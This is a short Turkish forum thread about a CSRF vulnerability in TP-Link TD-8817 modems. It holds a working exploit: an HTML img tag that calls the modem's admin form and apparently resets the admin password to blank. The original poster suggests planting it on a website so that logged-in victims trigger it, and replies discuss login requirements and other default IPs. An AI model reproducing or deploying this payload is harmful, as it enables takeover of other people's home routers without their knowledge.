

TP-Link TD-8817 Marka Modemlerde CSRF Açığı
-
Hocalar
TP-Link TD-8817 marka Modemlerin şifreli araryüzüne ulaşılması için parola resetleme için kullanıcak csrf kodu igm tagları arasına konulup kurbana bir şekilde açtırılıp örneğin bir web sitenie koyusurarak js ile eklenerek vs vs artık hayal gücüne kalmış bir şey (kurban modemde oturum açmış olması gererkiyor) modem arayüzünde sorulan kulanıcı adı ve parolayı kaldırtıp modeme default giriş yapılabiliyor kullanıcı adı admin şifre boş bırakılarak
kod aşşağıda highlighter dan js kaldırırlmış ekleyemedim direk yapıştırdım<html>
<!-- TP-Link TD-8817 CSRF Exploit -->
<body>
<img src="http://192.168.1.1/Forms/tools_admin_1"/>
</body>
</html> -
bu img tagındaki sayfaya erişim yapması için kullanıcı adı şifreyle modem paneline o oturumda giriş yapmış olması gerekiyor diye biliyorum (ufak hatırlatma)
-
birkaç sıfır modem kurulumu yapmıştım ip: 2.1 di
acaba 1.1 temese 2.1 denettirme şansımız varmı tek seferde ?
edit bahsettiğim tp*link modemdi aynı şekilde
zalimadam tarafından 12/Nis/13 15:38 tarihinde düzenlenmiştir -
Cosmic bunu yazdı
bu img tagındaki sayfaya erişim yapması için kullanıcı adı şifreyle modem paneline o oturumda giriş yapmış olması gerekiyor diye biliyorum (ufak hatırlatma)
csrf nin mantığı bu haklısın girirş yapmadan nasıl değişecek yoksa herhangi bir kullanıcıdan farksız olur onu belirtmedik düzeltmek gerek